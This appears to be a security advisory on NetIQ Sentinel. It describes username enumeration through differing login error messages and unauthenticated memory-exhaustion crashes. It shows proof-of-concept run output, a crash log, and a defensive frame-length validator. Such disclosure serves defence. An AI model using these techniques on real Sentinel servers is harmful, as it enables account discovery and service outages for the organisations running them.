NetIQ Sentinel is a full-featured Security Information and Event Management (SIEM) solution. One of the features it provides is a Java Web Start client. The client is downloaded over port 8443 and then connects to the server on port 10013.
Web Start Client: Account Enumeration
The Web Start client appears to use a custom protocol to talk to the Sentinel server. The protocol is a mix of binary type/length fields and XML payloads, and it is multi-channel. For example, logging into Sentinel through the Web Start client requires two separate SSL connections: the authentication request is sent on the first channel and the response comes back on the second channel.
One thing observed while watching the web client is that the server responds differently to authentication requests for existing and non-existing accounts. For example, if an attacker tries to authenticate as the non-existent user 'lolwat', Sentinel responds that the user 'lolwat' does not exist. If the attacker instead tries to authenticate as the default admin account with a wrong password, Sentinel responds with the error 'DBLogin: Authentication failed: FATAL: password authentication failed for user'. As the first example shows, this is clearly a concern: CWE-203 (information exposure through an observable discrepancy). Tenable created a POC to demonstrate the issue. The output below uses is_valid_account.py against three accounts: admin (valid), lolwat (invalid) and albinolobster (valid):
MUSTELIDAE:~ badger$ python is_valid_account.py 192.168.1.193 10013 admin
[...]
[+] Reply Channel: proxy.reply.3BAA5635-B5AE-1034-8881-000C29589EDB
[...]
MUSTELIDAE:~ badger$ python is_valid_account.py 192.168.1.193 10013 lolwat
[+] Connection to 192.168.1.193:10013 as lolwat
[+] Session 1 Key: 3BAA5635-B5AE-1034-8898-000C29589EDB0.7552757420650569
[+] Session 2 Key: 3BAA5635-B5AE-1034-889C-000C29589EDB0.2653795890095556
[+] Reply Channel: proxy.reply.3BAA5635-B5AE-1034-889D-000C29589EDB
[+] Sending login request on channel 1
[+] Received login response on channel 2
[~] lolwat is not a valid username
MUSTELIDAE:~ badger$ python is_valid_account.py 192.168.1.193 10013 albinolobster
[+] Connection to 192.168.1.193:10013 as albinolobster
[+] Session 1 Key: 3BAA5635-B5AE-1034-88A3-000C29589EDB0.7966160316648959
[+] Session 2 Key: 3BAA5635-B5AE-1034-88A4-000C29589EDB0.01711136605560981
[+] Reply Channel: proxy.reply.3BAA5635-B5AE-1034-88A5-000C29589EDB
[+] Sending login request on channel 1
[+] Received login response on channel 2
[!] albinolobster is a valid username!
Denial of Service
While implementing the POC above, we quickly discovered that Sentinel is vulnerable to a number of denial of service attacks. Specifically, an unauthenticated remote attacker can easily make the server exceed the Java VM memory limit, triggering an out-of-memory exception. The JVM then shuts down and restarts the web UI (port 8443) and the Web Start server. In the server wrapper log, the exception, shutdown and restart look like this:
2017/01/09 10:04:19 | DEBUG | wrapperp | send a packet PING : ping
2017/01/09 10:04:23 | DEBUG | wrapperp | send a packet PING : ping
2017/01/09 10:04:27 | DEBUG | wrapperp | send a packet PING : ping
2017/01/09 10:04:31 | DEBUG | wrapperp | send a packet PING : ping
2017/01/09 10:04:35 | DEBUG | wrapperp | send a packet PING : ping
2017/01/09 10:04:40 | DEBUG | wrapperp | send a packet PING : ping
2017/01/09 10:04:44 | DEBUG | wrapperp | send a packet PING : ping
2017/01/09 10:04:47 | INFO | jvm 2 | Heap dump file created [1693956755 bytes in 30.545 secs]
2017/01/09 10:04:47 | INFO | jvm 2 | #
2017/01/09 10:04:47 | INFO | jvm 2 | # java.lang.OutOfMemoryError: Requested array size exceeds VM limit
2017/01/09 10:04:47 | INFO | jvm 2 | # -XX:OnOutOfMemoryError="kill -9 %p"
2017/01/09 10:04:47 | INFO | jvm 2 | #   Executing /bin/sh -c "kill -9 9204"...
2017/01/09 10:04:48 | DEBUG | wrapperp | send a packet PING : ping
2017/01/09 10:04:49 | ERROR | wrapper | [...]
2017/01/09 10:04:49 | [...] | Details:
2017/01/09 10:04:49 | [...]
2017/01/09 10:04:49 | STATUS | wrapper | JVM exited in response to signal SIGKILL (9)
2017/01/09 10:04:49 | DEBUG | [...]
[...]
Memory exhaustion crashes the Sentinel server. One POC triggers the exhaustion with type 9 packets, the other with type 3 packets; they are named type_9_dos.py and type_3_dos.py. Their output looks like this:
MUSTELIDAE:~ badger$ python type_9_dos.py [...]
[...]
    sslSocket.read(1024)
ssl.SSLEOFError: EOF occurred in violation of protocol (_ssl.c:1752)
MUSTELIDAE:~ badger$ python type_3_dos.py [...]
[...]
    sslSocket.read(1024)
ssl.SSLEOFError: EOF occurred in violation of protocol
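As an added illustration of the mitigation side (not code from the advisory, from Tenable or from NetIQ), the following Python parser shows how a type/length-framed protocol can validate a declared length before allocating anything, which is the class of check whose absence lets a single packet drive a JVM past its array-size limit. The 1-byte type / 4-byte length layout, the known-type set {3, 9} and the 1 MiB cap are assumptions; the advisory does not publish the packet format.

```python
import struct

# Constructed framing, assumed for this example: the advisory only says the
# Sentinel protocol mixes binary type/length fields with XML payloads and does
# not publish the layout. Assumed here: 1-byte type, 4-byte big-endian length.
HEADER = struct.Struct(">BI")
KNOWN_TYPES = {3, 9}       # the two packet types the advisory names (assumed set)
MAX_PAYLOAD = 1 << 20      # assumed per-frame cap (1 MiB); tune per deployment


class FrameError(ValueError):
    """Raised for any frame that must be rejected before allocation."""


def read_frame(buf, max_payload=MAX_PAYLOAD):
    """Parse one frame, validating the declared length before touching it.

    The vulnerable pattern is to size a buffer straight from the length field,
    which is how one packet can request an array larger than the VM allows.
    Here every check runs on the header alone, so a hostile length costs only
    a comparison, never an allocation.
    """
    if len(buf) < HEADER.size:
        raise FrameError("short header")
    ptype, length = HEADER.unpack_from(buf)
    if ptype not in KNOWN_TYPES:
        raise FrameError(f"unknown packet type {ptype}")
    if length > max_payload:
        raise FrameError(f"declared length {length} exceeds cap {max_payload}")
    end = HEADER.size + length
    if len(buf) < end:
        raise FrameError("truncated payload")
    return ptype, bytes(buf[HEADER.size:end]), bytes(buf[end:])


def validate_frame(buf, max_payload=MAX_PAYLOAD):
    """Return None if the frame is acceptable, otherwise the rejection reason."""
    try:
        read_frame(buf, max_payload)
    except FrameError as err:
        return str(err)
    return None


# Constructed sample frames (not captured from a real Sentinel server).
GOOD_FRAME = HEADER.pack(9, 8) + b"<login/>"          # well-formed type 9
OVERSIZED = HEADER.pack(9, 0xFFFFFFFF)                # claims a 4 GiB payload
TRUNCATED = HEADER.pack(3, 100) + b"<a/>"             # promises more than sent

if __name__ == "__main__":
    for name, frame in [("good", GOOD_FRAME), ("oversized", OVERSIZED),
                        ("truncated", TRUNCATED)]:
        print(name, validate_frame(frame) or "accepted")
```

The same bound belongs at the server's socket reader and in any IDS signature: a header whose length field exceeds the cap is a rejectable frame, not a reason to reserve memory.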